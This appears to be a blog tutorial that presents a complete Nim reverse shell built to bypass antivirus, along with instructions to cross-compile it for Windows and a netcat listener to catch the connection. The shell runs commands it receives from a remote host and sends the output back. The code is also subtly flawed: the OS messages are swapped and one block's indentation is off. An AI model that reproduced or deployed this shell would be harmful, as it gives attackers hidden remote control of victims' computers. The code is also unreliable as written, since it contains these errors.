How To Write A Reserve Shell In Nim To Bypass Antivirus

In this tutorial, you will learn how to write a reverse shell in Nim to bypass antivirus detection.

What Is Nim?

Nim is a scripting language similar to Python in syntax, but close to Golang in that it requires statically typed variables and it compiles its programs.

Why Use Nim?

However you feel about Python or Golang for that matter, Nim is worth looking at for offensive programming.

• Very mature FFI (Foreign Functiong Interface)
• Smaller compiled binaries than Golang. (KB’s versus 200+ KB)
• Cross-compilation support with mingw-64, similar to Golang.
• Can call the Windows API directly via the FFI

Want to learn more ethical hacking? I highly recommend buying my book made for beginners to Pentesting Become An Ethical Hacker. Check the price on Amazon.

Here’s What You Need

1. Kali Linux VM
2. Windows 10 VM

Once you install Nim in Kali Linux you can compile the program like so: nim -c program.nim or nim -c -r program.nim to run the program after compilation.

Write A Reverse Shell In Nim

A reverse shell is a good way to get started in writing offensive tooling in Nim. The syntax will be similar to Python, but more efficient in execution like Golang. Get the code for the reverse shell from The Ethical Hacking Guru Github.

You will not need to download any additional modules to run this code.

import os, net, osproc


var 
    sock = newSocket()

proc run(TARGET: string, RPORT: int): void =
    
    
    when system.hostOS == "macosx":
        echo "running on Windows!"


        try:
            sock.connect(TARGET, PORT(RPORT))

            while true:
                let cmd = sock.recvLine()
                if cmd == "exit":
                    break
                let result = execProcess("bash -c " & cmd)
                sock.send(result)
        except:
            raise
        finally:
            sock.close

    when system.hostOS == "windows":
        echo "running on Mac OS X!"


    try:
        sock.connect(TARGET, PORT(RPORT))

        while true:
            let cmd = sock.recvLine()
            if cmd == "exit":
                break
            let result = execProcess("cmd /c " & cmd)
            sock.send(result)
    except:
        raise
    finally:
        sock.close

when isMainModule:
  try: 
    let RPORT = 443
    let TARGET = paramStr(1)
    run(TARGET, RPORT)
  except:
    raise

The code is pretty simple, Nim is statically typed so that means you have to declare the variable type when you declare a variable for the first time. Proc means you are defining a function, and it requires the return object type too see proc run(TARGET: string, RPORT: int): void = .

The when isMainModule checks for execution of the program being from the main module, and not a library call for instance. This is similar to Python’s __main__. See “‘__main__’ is the name of the scope in which top-level code executes. A module’s __name__ is set equal to ‘__main__’ when read from standard input,” So for Nim, this is “True only when accessed in the main module. This works thanks to compiler magic. It is useful to embed testing code in a module.”

Cross compiling from Linux to Windows is simple all you need to do is download the mingw-w64 binary with sudo apt install mingw-w64. The compile the code with nim c -d:mingw –cpu:amd64 reverse_shell.nim to compile for 64 bit Windows. Finally to test your reverse shell you can use netcat like so nc -l 443

Recommended Reading

Want to learn more ethical hacking? I highly recommend buying my book made for beginners to Pentesting Become An Ethical Hacker. Check the price on Amazon.